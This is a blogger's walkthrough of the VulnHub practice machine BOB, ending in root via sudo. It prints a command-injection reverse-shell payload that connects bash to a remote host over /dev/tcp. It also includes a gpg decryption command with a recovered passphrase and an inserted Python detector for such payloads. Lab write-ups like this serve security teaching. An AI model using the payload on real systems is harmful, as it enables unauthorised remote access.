This is the vulnerable machine BOB from VulnHub. Rumor says it is a good beginner-to-intermediate machine, which is actually true. So without further ado, let’s start!!!
Initially, recon on the target is important, so I did the following:
Well, the scanning results gave a lot of information. As the web page was open, I enumerated it and found a strange string while reviewing the source code. Clearly it was Base64 encoded.
Okay, so we got some intel.
During the initial recon, we found another web page, which contains a web shell. I tried to abuse it with simple commands, but it seems they got filtered, so I went with another technique and used this payload:
id & /bin/bash -c '/bin/bash>/dev/tcp/192.168.230.128/4444 0>&1 2>&1 &'
Meanwhile, my nc listener was waiting in my shell, and yes!!! We got a shell after code execution on the web page.
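For the defending side, the payload above leaves two clear indicators in whatever logs the web form's input: a command chained with a control operator, and a bash redirect to /dev/tcp/HOST/PORT, which bash treats as opening a socket. The check below is an added example, not part of the original write-up; the function name, verdict labels and sample submissions are constructed for illustration.

```python
import re

# bash pseudo-device: a redirect to /dev/tcp/HOST/PORT opens a network socket
NET_REDIRECT = re.compile(r"/dev/(tcp|udp)/([^/\s'\"]+)/(\d+)")
# Control operators that chain or embed a second command. The "&" inside
# the redirections >&, <& and &> is deliberately not counted.
CHAINING = re.compile(r"&&|(?<![<>&])&(?![>&])|[;|`]|\$\(")

def inspect(command):
    """Return the indicators found in one command string sent to a web form."""
    sockets = [(m.group(1), m.group(2), int(m.group(3)))
               for m in NET_REDIRECT.finditer(command)]
    operators = sorted(set(CHAINING.findall(command)))
    if sockets:
        verdict = "alert"    # a shell is being wired to a network socket
    elif operators:
        verdict = "review"   # more than one command in a single field
    else:
        verdict = "ok"
    return {"verdict": verdict, "sockets": sockets, "operators": operators}

# Constructed sample submissions; the second is the payload from the write-up.
SAMPLES = [
    "id",
    "id & /bin/bash -c '/bin/bash>/dev/tcp/192.168.230.128/4444 0>&1 2>&1 &'",
    "ls -la 2>&1",
    "whoami; uname -a",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = inspect(sample)
        print(result["verdict"], result["sockets"], result["operators"], "|", sample)
```

The extracted host and port give responders the callback address to look for in firewall or netflow records.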
After internal recon, there’s a file, .old_passwordfile.html. Hmm, we got jc’s credentials.
Through internal recon, there’s a file called notes.sh echoing some text, so let’s keep it aside. There’s also another file, login.txt.gpg, which was initially hard to decrypt; the clue was in the file notes.sh. Each letter is in capitals, so if you combine all the letters, you’ll form the word HARPOCRATES.
Now let’s do some gpg magic. Run the following command:
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
Okay, so we got some text; it seems to be bob’s credentials.
After bob’s login, I ran sudo -l and, after observing all the results, I ran sudo /bin/bash, and we are root!!!!
That’s all for now. If you faced any issue or if there’s any issue on my side, please let me know.
LinkedIn :- https://www.linkedin.com/in/user-neeleshpatel/
Until Next Time,